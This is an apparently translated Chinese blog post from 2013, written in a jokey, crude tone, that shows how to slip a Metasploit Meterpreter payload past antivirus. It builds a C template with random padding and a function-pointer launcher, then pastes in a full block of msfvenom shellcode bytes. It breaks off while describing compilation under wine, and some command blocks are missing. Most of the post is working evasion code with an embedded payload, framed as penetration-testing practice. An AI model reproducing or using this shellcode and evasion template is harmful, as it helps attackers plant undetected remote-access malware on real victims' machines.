那些年一起绕过的杀软

日期: 2013年6月10日 | 标签:杀软 | 阅读:938

译者:月巴_又鸟

在实际的渗透测试中,你发现了一大堆充满各种漏洞的主机.此时你花了大量的时间来收集关于这些主机的信息和情报…下一步，你洗干净屁股，准备大干一场. ╮(￣▽￣)╭ 跟普通的黑阔基佬一样，没错，本基喜欢用meterpreter 作为 payload。只因meterpreter提供好了许多好玩又方便的函数. 我和我的基友们已经撸开了Metasploit, 为目标准备好了小皮鞭与蜡烛（exploit ）, 目送着我的payload上传到目标机子上,但悲剧的是：目标机器居然一点反应也没有，难道是性冷淡？！！

究竟发生了什么问题呢? 好吧，明显是很多地方都可能出现错误, 漏洞利用脚本的版本错误、 exp没有工作, 等等. 但是当你发现每个环节都没有出现错误时, 那最大的可能就是反病毒软件拦截了你的meterpreter payload啦。本基就经常遇到过这种事——当我裤子已经脱了,上来的却是居委扫黄小组的大妈…(＞﹏＜)当经受过无数次大妈的蹂躏之后，本基决心研究绕过技术，现在把欺骗绕过杀毒软件技术公诸于众，让各位机油过上性福的生活..….

首先，我要感谢这两篇我本文引用的文章（连接请见下文）. 这两篇文章给了我很大的启迪，本文一些源代码都是在这两篇文章中摘录，读者们可以自行研究这两篇文章，说不定会有更多的收获哟。

一个绕过杀毒软件的方法是：为meterpreter创建一个可执行的“定制”模板 . 你可以使用以下的代码来作为你这个模板的基础 (来吧,骚年！亮出你最拿手的编辑器，并创建文件“base.c”, 让我们哄哄烈烈地干一场吧):

`01`	`// This should be random padding`

`02`	`unsigned` `char` `padding[]=`

03

04 ;

05

`06`	`// Our Meterpreter code goes here`

`07`	`unsigned` `char` `payload[]=`

08

09 ;

10

`11`	`// Push Meterpreter into memory`

`12`	`int` `main(void) { ((void` `(*)())payload)();}`

当毛躁毛躁的代码创建完毕后, 第一件事情呢，就是要生成大随机数来填补我们文件的开头部分啦。我们生成大随机数的语句命令如下文所示。你能简单地定制大随机数的长度，如下文的”-c 1028”，此时将生成一个1028位的大随机数。

我们的命令和输出看上去会像是下面这个样子:

“Ctrl+C”、“Ctrl+V”这个大随机数进入我们的 base.c 文件里，这个大随机数粘贴的位置类似下文:

`01`	`// This should be random padding`

`02`	`unsigned` `char` `padding[]=`

03 "F9d9CxkqvLlodqpws5x4KoI3KoLdcLTae-0DMrcDZiscZi7Gmzug6g1n8L_W6pzPR-bGsm74TBHy3GDof6o-cMIAaiF5nEvEadpxl9p94w12fiLDreuEjLLhW2QXFbKBAIWOKXvMoiBGZHZY4Lyk24HTPuTonrTbf__hZ0G_q_5DVXfKU0s-muqroz-U6j-wDrX2CzKapy8o1Y5zGo0T3BozAuzwe7Q1A-R4JIWEU8LR-8MJrlF5ZthMo4M661VM8-6CY7duKz29tiPr5IEtpYXBVJyhHYCsPd5iVrNc3wzSVQ6jP9dht-znpNi4-wqWVjKng_3j5WjOlva3_jqLcqkMQ5NfrT7ipYlqxvqgYMUU8rvo9PS_DVkA3tM0W1T6BXLE7nmvZmxojfwfNKQEzzCn1-tYyqcd1z1UTnGEIoZp2sHY-kgofDDnHbNk-4-oMQdwuBt56oCWh7jcNwokcpte26FLJBX4C-yM46CJUlNFrgBg28776xxlTyC02Hs-YdkR-rJNvTt3OWOdCNt-1ocoj20QskIVdv2_XZgrTnxyIEOBBYrrmKHgBq4Qvd816iK1Ua2ZymTVRov1qJeiqvIoCr-hufUkQGjMCCGGSAjPacemgU3ztZZZJIPpB7Dc_zIpkSsaCr0kpDz9lFPn-Fn--cQh2l2gUIA8eiMHFeMLDh40da83tfThQqd_MsGb2OL2LmGCpV_QUdbFecP6-eI80sZG34j9Z3ur_6blZbu1f1qjME-bJKJ2ueT0arvydnnfzHIOt-vt26f0cBeE_11hUiTYmhtH9U4Mppe-eVMUJ5E3XU-Q-20-qCZZBWGV0kK4Lpxu8QGI_NrkRcS3CEantKhUkIaxxXWZRJvk0uEcB_YHerHjZT6Fw8_omY8O2BLT5sAg7f-MQm1P8RfTXYILiTbaqzxvg44y8zdEQpzPY4bgy3svNFVheIseFmOPKs-jL5eJkOlrkvniKFwCKatGKF8Aewli1sYmLP3HKVK8Voy-7b-j377x-SMQKUyByz9F"

04 ;

05

`06`	`// Our Meterpreter code goes here`

`07`	`unsigned` `char` `payload[]=`

08

09 ;

10

`11`	`// Push Meterpreter into memory`

`12`	`int` `main(void) { ((void` `(*)())payload)();}`

当随机数弄好之后,接下来就是我们的 meterpreter shellcode啦. 什么？你不会写？没关系！Msfvenom在手，shellcode 我有！用本基下面的命令，再变换一下payload的名称，妈妈再也不用担心我的shellcode:

当我们的 meterpreter shellcode创建完毕后, 再次像大随机数一样，复制粘贴进我们的base.c 文件里.当你完成之后，你的base.c文件看起来应该像下面的一样:

`01`	`// This should be random padding`

`02`	`unsigned` `char` `padding[]=`

04 ;

05

`06`	`// Our Meterpreter code goes here`

`07`	`unsigned` `char` `payload[]=`

`08`	`“\xba\xd7\x0c\xb4\xfa\xd9\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1″`

`09`	`“\x57\x83\xe8\xfc\x31\x50\x0e\x03\x87\x02\x56\x0f\xfd\xca\x4f”`

`10`	`“\x84\x25\x19\xd5\x05\x4e\x2c\x7c\x9b\xb9\x67\x30\x73\x88\x22″`

`11`	`“\x2b\x77\xbf\xd4\xc8\xb2\x5b\x6c\xf6\xd2\xd0\x3a\x54\xb7\xb6″`

`12`	`“\x6a\xd0\x10\xc4\xae\x92\xb7\x9b\xb4\x9c\x02\x72\xea\xfe\x1d”`

`13`	`“\xb9\x31\xbf\x3e\x09\xf5\x69\x25\xcb\x31\x56\x43\x8b\xec\xfe”`

`14`	`“\xd1\xbf\xad\x50\x7e\x8f\x9d\x5f\x13\xb8\xd6\x4a\x03\xfc\xb1″`

`15`	`“\x89\x08\x6f\xf9\x35\x3b\x1a\xd3\xf7\xe5\x50\x13\x0a\x0b\xc3″`

`16`	`“\x87\x34\x9c\x4c\x4b\xcf\xbf\x01\x20\x45\x85\x8e\x82\x1c\x0c”`

`17`	`“\xfa\x47\xa6\x03\xef\x16\xbd\xe9\x99\x87\xa9\xa9\x75\xf6\x6d”`

`18`	`“\x6c\x43\xa8\xd9\xd0\x18\xb4\xd1\x93\x18\xf1\x3f\x08\xd0\xe3″`

`19`	`“\x7a\x66\x1e\x90\x70\x90\xc3\x01\x61\xaf\xb4\xc0\x1e\xd8\x6d”`

`20`	`“\xb7\x88\xfa\x7b\x2d\x75\x2f\xea\xda\x22\x2f\x26\x7a\x7c\x4e”`

`21`	`“\x0a\xb8\x7a\xac\x1b\x74\x17\x3c\x92\x18\x6d\x67\xb3\x01\xb1″`

`22`	`“\x4a\x43\xe4\x72\xf8\x15\xf8\x4b\x4a\xfb\x65\xbb\xf2\x6f\xe9″`

`23`	`“\x9f\x58\x6b\xcd\x96\x7b\x80\xa9\xfe\xa6\x2e\xf7\xfa\xf5\x1d”`

`24`	`“\xc5\xd4\x3d\x73\xe2\xd2\x94\xce\x85\x35\x62\xc4\xb9\x1b\x87″`

`25`	`“\x20\x46\x16\xa6\xa4\xc2\x74\xfc\x5c\xfb\x83\x8b\x60\x4a\xd1″`

`26`	`“\x72\x48\xab\xd7\xd9\x86\x7f\x2b\xbb\x06\x74\x54\xf0\xb6\xb8″`

`27`	`“\xa8\x16\x97\xa2\xba\xc3\x79\x6f\xab\xdd\x6f\x3c\x74\x6c\xf4″`

`28`	`“\x9d\xcc\x34\x84\xef\x34\x0c\x78\xc1\xe9\x2e\x57\xf6\x73\x9f”`

`29`	`“\x12\x58\x6f\x48\xb5\x04\x45\x13\x86\x3c\xbb\xab\xce\x8a\x15″`

`30`	`“\x07\x65\x73\x0e\x50\xd1\xa2\x29\x6b\x46\x3b\x40\x9c\x56\x1a”`

`31`	`“\xb6\x8d\x22\x16\x66\x2f\xa8\x03\xdc\x58\x48\x91\x44\x18\xd9″`

`32`	`“\x1d\xb6\x0f\xfe\xca\x7b\x03\xd1\x94\x54\xba”`

33 ;

`34`	`// Push Meterpreter into memory`

`35`	`int` `main(void) { ((void` `(*)())payload)();}`

恭喜！你已经制作出了一个相当漂亮的模板了. 现在, 我们要干的只有编译它了. 我喜欢Backtrack里wine搭载的gcc.exe 编译程序.先切换目录到编译器所在的目录 ( /root/.wine/drive_c/MinGW/bin/gcc.exe), 通过wine调用编译器并且提供给他源代码和输出的路径, 如下图所示: